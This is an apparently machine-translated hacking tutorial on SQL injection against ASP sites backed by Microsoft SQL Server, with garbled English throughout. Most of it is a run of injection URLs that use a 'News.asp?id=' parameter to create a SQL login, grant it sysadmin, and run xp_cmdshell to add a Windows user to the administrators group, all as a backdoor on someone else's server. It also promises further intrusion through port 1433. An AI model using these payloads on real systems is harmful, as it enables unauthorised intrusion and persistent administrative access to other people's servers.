Some attacks on SQL databases (turn)

Some attacks on SQL databases
Specific content:
For a lot of news at home and abroad, BBS and E-commerce sites are used asp+sql design, and write ASP programmers Many (there are a lot of just graduated), so, Asp+sql attack success rate
is also relatively high. This kind of attack method and the version of NT and the SQL version is not much relationship, there is no corresponding patch, because the vulnerability is caused by the programmer, and most of the explanation ASP
Cheng's book, the source code examples have this flaw exists, in fact, just some legitimate ASP request for SQL, leaving endless!
This attack method originated from the Or1=1 Vulnerability (we call it a vulnerability), the principle of this loophole I think we all know, then the attendant is; exec
sp_addlogin Hax (Add a Hax user to the database), but this method is very restrictive, first the ASP uses the SQL Server account is an administrator, the second request of the submitted change
At the end of the entire SQL statement, because some programmers use the SELECT * from News WHERE id= ... and topic= ... And .....
This method requests the database, so if you use the example above you will
News.asp?id=2;exec sp_addlogin Hax
becomes a SELECT * from news WHERE id=2;exec sp_addlogin Hax and topic= ... And ...
The entire SQL statement after the execution of the sp_addlogin stored procedure with and and the judgment exists, the syntax is wrong, your sp_addlogin natural also can't run normally, so try the following side
Method
News.asp?id=2;exec sp_addlogin hax;--
Later--the symbol of the sp_addlogin after the judgment statement into a comment, so there will be no grammatical errors, sp_addlogin normal execution!
Then let's use it together.
News.asp?id=2;exec Master.dbo.sp_addlogin hax;--
News.asp?id=2;exec Master.dbo.sp_password null,hax,hax;--
News.asp?id=2;exec Master.dbo.sp_addsrvrolemember SysAdmin hax;--
News.asp?id=2;exec Master.dbo.xp_cmdshell net user Hax hax/workstations:*/times:all/passwordchg:yes/passwordreq:yes
/active:yes/add;--
News.asp?id=2;exec Master.dbo.xp_cmdshell net localgroup administrators hax/add;--
So, you left the Hax administrator account in his database and system.
Of course, the prerequisite is the ASP with the Administrator account, so the virtual space we do not try, there will be no loophole.
Later we will discuss, if the other side of the ASP is not using SQL Administrator account, how we invade, of course, will involve 1433-port intrusion
Of course, we can try to add a symbol behind the id=2, mainly look at each other's ASP how to write
What do we do when the SQL account that the ASP program uses is not an admin?